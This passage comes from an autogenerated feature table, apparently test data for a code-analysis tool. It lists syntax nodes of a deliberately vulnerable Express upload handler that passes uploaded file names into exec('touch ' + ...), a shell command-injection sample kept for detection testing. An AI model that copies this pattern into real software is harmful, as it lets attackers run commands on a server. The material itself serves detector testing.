express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | exceptional return of anonymous function | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | return of anonymous function | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:47:10:1 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:57:8:59 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:62:8:64 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:62:8:64 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:62:8:64 | res | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:62:8:64 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:62:8:64 | res | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:67:8:70 | next | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:67:8:70 | next | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:67:8:70 | next | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:67:8:70 | next | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:67:8:70 | next | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:6 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:6 | exec | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:6 | exec | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:6 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:6 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exceptional return of exec("t ... alname) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exceptional return of exec("t ... alname) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exceptional return of exec("t ... alname) | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exceptional return of exec("t ... alname) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exceptional return of exec("t ... alname) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:15 | "touch " | stringConcatenatedWith | -endpoint- req.file.originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:8:9:39 | "touch ... nalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:21 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:21 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:21 | req | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:21 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:26 | req.file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:26 | req.file | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:26 | req.file | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:26 | req.file | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:26 | req.file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:19:9:39 | req.fil ... nalname | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:23:9:26 | file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:23:9:26 | file | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:23:9:26 | file | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:23:9:26 | file | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:23:9:26 | file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:28:9:39 | originalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:28:9:39 | originalname | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:28:9:39 | originalname | enclosingFunctionBody | req res next exec touch req file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:28:9:39 | originalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:28:9:39 | originalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:3 | app | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:3 | app | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:8 | app.post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:12:8 | app.post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | app.pos ... })\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | app.pos ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | app.pos ... })\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | exceptional return of app.pos ... })\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | exceptional return of app.pos ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | exceptional return of app.pos ... })\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:5:12:8 | post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:5:12:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:5:12:8 | post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:10:12:25 | '/photos/upload' | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:33 | upload | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:33 | upload | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:33 | upload | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:39 | upload.array | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:39 | upload.array | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:39 | upload.array | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | exceptional return of upload. ... s', 12) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | exceptional return of upload. ... s', 12) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | exceptional return of upload. ... s', 12) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:35:12:39 | array | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:35:12:39 | array | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:35:12:39 | array | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | CalleeFlexibleAccessPath | upload.array | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | calleeImports | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:41:12:48 | 'photos' | receiverName | upload | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | CalleeFlexibleAccessPath | upload.array | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | calleeImports | multer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:51:12:52 | 12 | receiverName | upload | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:12:55 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:12:55 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:12:55 | this | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:12:55 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:12:55 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | exceptional return of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | functio ... \\n })\\n} | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | return of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:56:16:1 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:66:12:68 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:71:12:73 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:71:12:73 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:71:12:73 | res | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:71:12:73 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:71:12:73 | res | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:76:12:79 | next | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:76:12:79 | next | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:76:12:79 | next | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:76:12:79 | next | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:76:12:79 | next | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:5 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:5 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:5 | req | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:5 | req | enclosingFunctionName | app.post#functionalargument | +| 